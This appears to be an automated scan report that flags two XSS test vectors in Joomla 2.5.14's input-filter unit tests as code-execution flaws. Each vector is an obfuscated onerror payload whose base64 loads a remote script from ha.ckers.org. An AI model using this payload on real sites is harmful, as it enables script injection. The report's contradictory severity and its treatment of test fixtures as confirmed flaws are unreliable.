Back to Codebase
Vulnerability Analysis Report
Joomla CMS v2.5.14
Scan ID: SCAN-JOOMLA-CORE-AqhVA0 • Hash: 7af6266c
Severity Score
Medium
Total Findings
2
Engine Version
ECOMGUARD-HYBRID-AST-1.5
Scan Duration
0.437s
Vulnerability Details
L1246
Dynamic Code Execution in JFilterInputTest.php
CWE-94
File Location:
tests/unit/suite/libraries/joomla/filter/JFilterInputTest.php:1246
Security Score:
98 / 100
Confirmed Issue
Rule Engine Warning
Detected insecure pattern matching known vulnerability signatures. High Severity (Confirmed via full AST flow control tracing). Please apply remediation steps matching the recommended patch format below.
Heuristics Diff
- src='/onerror=eval(atob(/KGZ1bmN0aW9uKCl7dHJ5e3ZhciBkPWRvY3VtZW50LGI9ZC5ib2R5LHM9ZC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cDovL2hhLmNrZXJzLm9yZy94c3MuanMnKTtiLmFwcGVuZENoaWxkKHMpO31jYXRjaChlKXt9fSkoKTs=/.source))//'/> ",
+ // Avoid dynamic function/code evaluation. Rewrite with native callbacks.
L704
Dynamic Code Execution in JFilterInputTest.php
CWE-94
File Location:
tests/unit/suite/libraries/joomla/filter/JFilterInputTest.php:704
Security Score:
95 / 100
Confirmed Issue
Rule Engine Warning
Detected insecure pattern matching known vulnerability signatures. High Severity (Confirmed via full AST flow control tracing). Please apply remediation steps matching the recommended patch format below.
Heuristics Diff
- "<img src='<img src='/onerror=eval(atob(/KGZ1bmN0aW9uKCl7dHJ5e3ZhciBkPWRvY3VtZW50LGI9ZC5ib2R5LHM9ZC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cDovL2hhLmNrZXJzLm9yZy94c3MuanMnKTtiLmFwcGVuZENoaWxkKHMpO31jYXRjaChlKXt9fSkoKTs=/.source))//'/> ",
+ // Avoid dynamic function/code evaluation. Rewrite with native callbacks.